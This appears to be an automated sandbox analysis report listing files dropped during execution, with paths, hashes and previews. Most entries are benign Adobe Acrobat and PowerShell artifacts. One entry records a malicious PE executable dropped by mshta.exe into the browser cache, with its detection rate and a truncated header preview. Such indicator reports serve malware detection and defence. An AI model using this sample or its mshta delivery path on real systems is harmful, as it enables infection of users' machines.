                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJfshHHrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGUUUkee9
                                                                                                                  MD5:1AB774CB3477E791167E2628A154D582
                                                                                                                  SHA1:1466879E78B0A2FE062C062CBE87C1CD6A45ACA6
                                                                                                                  SHA-256:9448496312AA68049C04B1B215E3FCD9CB2C05D4F598522BE7A2746528DE82B8
                                                                                                                  SHA-512:704849713855B86F44192E86F9564520A5D1986CF242F96FB8C7FB0C84E6E9BA1B95CB56AED2D863F6D9F74A7EE80C62DD68F9C93017844E56D93CB2727A5E78
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):282
                                                                                                                  Entropy (8bit):5.252000470554508
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXDdt3mobJH2vB3/dVlPIHAR0YQouoAvJTqgFCrPeUkwRe9:YvXKX+obV2vR/ZwHAsoFGTq16Ukee9
                                                                                                                  MD5:4BDA058AE856EFA992600C94225A3847
                                                                                                                  SHA1:DC5036B1F55D402C0F12536B22E562ED6E6399D6
                                                                                                                  SHA-256:700DDC762CAA6998768D1DA98D8E23C694C0B2F222179C45790074E63D86C477
                                                                                                                  SHA-512:A0852987A5A6C3435A6297CCC66C90A72260C561E2E24894BBCF41EE2CF2682442679E6C4D24AC0DEC501F88685AA8B0D12BC05FAC26A2685C97B00FB5345D4A
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"4011b47a-71f0-46cd-a55e-a5efb8f2aadf","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1735112419519,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4
                                                                                                                  Entropy (8bit):0.8112781244591328
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:e:e
                                                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                  Malicious:false
                                                                                                                  Preview:....

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2814
                                                                                                                  Entropy (8bit):5.133342094278186
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:YJLGaKPayl5eBon4OP47b1Mh9j1uv2j0SPVVPA/202LShCAIwK2s0M589kPFuDFj:YI0By4gqwL5VW1LuwK2sri9OY
                                                                                                                  MD5:5DCC4F373920165E7796E9667461656D
                                                                                                                  SHA1:EF0C6B2B88920AAF5EF9057206E0AA0D658A5898
                                                                                                                  SHA-256:BEB7FF36E3F2EDB333915A551745A841A03440833C5908C424EC98B7EC9431F4
                                                                                                                  SHA-512:9C7E52B022B4EACE11DBD2883DFA5995C3268636EF201BE1120157B19F9B18DC2E84DA1D7BE5F58E4CAE5CD379DD77B594B784139F34BE7EF68F4A2240DBDFDB
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"8858d1b6a6691979dbd594ca09932123","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1734934099000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"e61dd9e36175f642b348bc5427e189e3","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1734934098000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"9671db36ae2d5ccf8574a809548f29c2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1734934098000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"756e7c4452efc55eb6aef14673cf8c0c","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1734934098000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"00c67df63f347560c915dadd5466c366","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1734934098000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"877dc0df75043f99f29a003eeb30dcf3","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):12288
                                                                                                                  Entropy (8bit):1.3187579362432291
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLKufx/XYKQvGJF7urs9Ohn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMelrtqVpt:TGufl2GL7ms9WR1CPmPbPahlRypilIfB
                                                                                                                  MD5:5BF7829BD2CF308B4099D471F5DBE711
                                                                                                                  SHA1:D595638C70D248E55EEDBDB628EF06E685F0730E
                                                                                                                  SHA-256:F38B209FAAC008A9D5B66D6EBFFE128A0DD5B16F1C48A618A1EB5E03E8BDFC06
                                                                                                                  SHA-512:D8B8FA8926795A34E6A03E8324F5D59A5F874C1CD516CD885919FFF66CC371F545833E163EBF1770E840BDD68F2CE541522700D7510D3376568FBC5244C4B605
                                                                                                                  Malicious:false
                                                                                                                  Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8720
                                                                                                                  Entropy (8bit):1.7808875523135055
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:7+t5lhn07oz7oF0Hl0FopUEiP66UEiPbnPnNknNMelr4qVpaVrScVr0InZqLhx/d:7MWWR1CPmPbPahl0ypilIkqFl2GL7msD
                                                                                                                  MD5:D97D26675E1070E36029F414EBBDCD1C
                                                                                                                  SHA1:469FF0DF2145777A23ABC1842047A986F6C1C8F9
                                                                                                                  SHA-256:8AC1014F954C056AB65225416D2596E998973B4A50181BE3604BBEF32AFC9C02
                                                                                                                  SHA-512:7F484BE095E129CE565A87E8C860E18D3F79A5557E04EEDA1055B775653D8666E78581864F31248122ADEF393E184C7E6E0291C12A037C77A2258BCD18F538FC
                                                                                                                  Malicious:false
                                                                                                                  Preview:.... .c........`..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................^..^.^.^.^.^.^.^.p.p.p.p.p.p.p.p.p.p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):66726
                                                                                                                  Entropy (8bit):5.392739213842091
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:RNOpblrU6TBH44ADKZEgTQAUQtbXtDisR5BcJloJ7DTNYyu:6a6TZ44ADEcAUQtbJisd7/NK
                                                                                                                  MD5:C5188F090110D8BCBF5F4469DD98CE6B
                                                                                                                  SHA1:94C858884152E3ED692B3BF2A2F267612BD9989F
                                                                                                                  SHA-256:A7BF521608F047E2D76A809AABBAEC3C2F32ECA2ABC7100D9967A807E03F994D
                                                                                                                  SHA-512:1BFA42261624B93CD32AA65D7521237E369569FA5EFD23E6427D980CFACCFCF724BB6FDA5224EF54611BDAEDD4F087245FD3FB591681538ACACA2B92C0257C67
                                                                                                                  Malicious:false
                                                                                                                  Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\duychuan1[1]

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):440983
                                                                                                                  Entropy (8bit):6.371060302148664
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:IhaNDyEJXsEy62haNDyEJXsEy6fhaNDyEJXsEy6XhaNDyEJXsEy64haNDyEJXsEV:Hj186Nj186Oj1862j186Xj186Z
                                                                                                                  MD5:568DA0FF069F69A99BA77F5BFD545E62
                                                                                                                  SHA1:43A07F3A4F6FD731737FE8AB7DCB113D6FFB9778
                                                                                                                  SHA-256:697BB49E47605C59B4994031DDBC1EFB65A2BEB7E7B971F2E3B0B4FB7B27B2F8
                                                                                                                  SHA-512:0A25427CE5471E95F38A71ECDB2CA7519EDAE3401686D8A90244DDDC533639D298D2E5088962EC62DDB28C99D395C4355E1900AED90B78E796794EA3566B580D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(.z.{.z.{.z.{...z.z.{...z.z.{...z.z.{...z.z.{.z.{.{.{...z.z.{...{.z.{...z.z.{Rich.z.{........................PE..L............................T......P.............@..........................p......&.....@...... ..........................P...,....P..(....................`.......1..T...............................................L.......@....................text............................... ..`.data...|...........................@....idata..D).......*..................@..@.didat.......@.......$..............@....rsrc...(....P.......&..............@..@.reloc.......`.......2..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):11608
                                                                                                                  Entropy (8bit):4.890472898059848
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                                                                  Malicious:false
                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e...........................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\MSI75157.LOG

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):246
                                                                                                                  Entropy (8bit):3.5178552411299933
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8rOlAimlxYle:Qw946cPbiOxDlbYnuRKDlfw
                                                                                                                  MD5:78205219290890F0D40E553DF5E345B4
                                                                                                                  SHA1:EB95BC97122D60C7984627BFE32000F2CAC071AC
                                                                                                                  SHA-256:98F985CCBC74B9AB9C8BCD121126EDAC2CE1B4A16E9F68AEBBBB9C62AF86C521
                                                                                                                  SHA-512:B1BE75E7DDE3B148A478B96C61B336F3AC48472DCFBD360222F3FEAFBFDC2AB3D6AF145FAF4E2B4CF5B73B18C224697C2DC1690FCC64DA63D90BF98B8E5228AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .2.3./.1.2./.2.0.2.4. . .0.1.:.0.8.:.1.6. .=.=.=.....

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acpecle5.wrm.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cp1n5lzj.gus.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnas55tj.xmj.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gufu13b5.uwv.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_petmplcw.icu.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qc5ak1ii.ehn.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s13hty1w.ets.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sf0x3fh5.5dj.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugl4nnfy.abu.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vp3nmppz.ppd.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-23 01-08-10-491.log

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:ASCII text, with very long lines (393)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):16525
                                                                                                                  Entropy (8bit):5.33860678500249
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:IC2heaVGJMUPhP80d0Wc+9eG/CCihFomva7RVRkfKhZmWWyC7rjgNgXo6ge5iaW0:X8B
                                                                                                                  MD5:C3FEDB046D1699616E22C50131AAF109
                                                                                                                  SHA1:C9EEA5A1A16BD2CD8154E8C308C8A336E990CA8D
                                                                                                                  SHA-256:EA948BAC75D609B74084113392C9F0615D447B7F4AACA78D818205503EACC3FD
                                                                                                                  SHA-512:845CDB5166B35B39215A051144452BEF9161FFD735B3F8BD232FB9A7588BA016F7939D91B62E27D6728686DFA181EFC3F3CC9954B2EDAB7FC73FCCE850915185
                                                                                                                  Malicious:false
